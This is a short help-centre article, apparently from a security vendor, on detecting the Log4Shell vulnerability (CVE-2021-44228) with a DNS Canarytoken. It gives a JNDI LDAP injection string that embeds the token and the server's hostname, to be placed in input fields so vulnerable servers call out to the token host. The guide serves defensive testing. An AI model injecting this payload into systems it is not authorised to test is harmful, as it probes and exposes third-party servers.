Skip to main content

Search

Using a Canarytoken to help test for CVE-2021-44228 (log4j/log4shell)

Use the DNS Canarytoken to safely test for Log4Shell (CVE-2021-44228). Generate a DNS token, embed it in a JNDI LDAP string, and detect vulnerable systems instantly.

You can use the DNS Canarytoken to help you test for CVE-2021-44228.

Step 1: Click the Canarytoken tile

On your console, click Add new Canarytoken.

CleanShot 2024-08-16 at 09.22.30@2x.png

Step 2: Select DNS token

Select the DNS token.

CleanShot 2024-09-13 at 10.55.09@2x.png

Step 3: Enter token reminder

Enter a reminder note for the token (Note: We used Testing log4shell #1).

CleanShot 2024-09-13 at 10.57.48@2x.png

Step 4: Copy token

The server will generate a DNS-based token for you. Copy this Token.

CleanShot 2024-09-13 at 10.58.25@2x.png

Step 5: Deploy the token

Place this copied token in the jndi:ldap string as follows:

${jndi:ldap://x${hostName}.L4J.INSERT-COPIED-STRING-HERE/a}

For example, the updated string will look as follows:

${jndi:ldap://x${hostName}.L4J.v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io/a}

Place the resultant string into search boxes and fields that will be parsed by your logging libraries, and if one of them is vulnerable, you will receive a notification that includes the hostname of the vulnerable server.

Was this article helpful?
61 out of 79 found this helpful
Return to top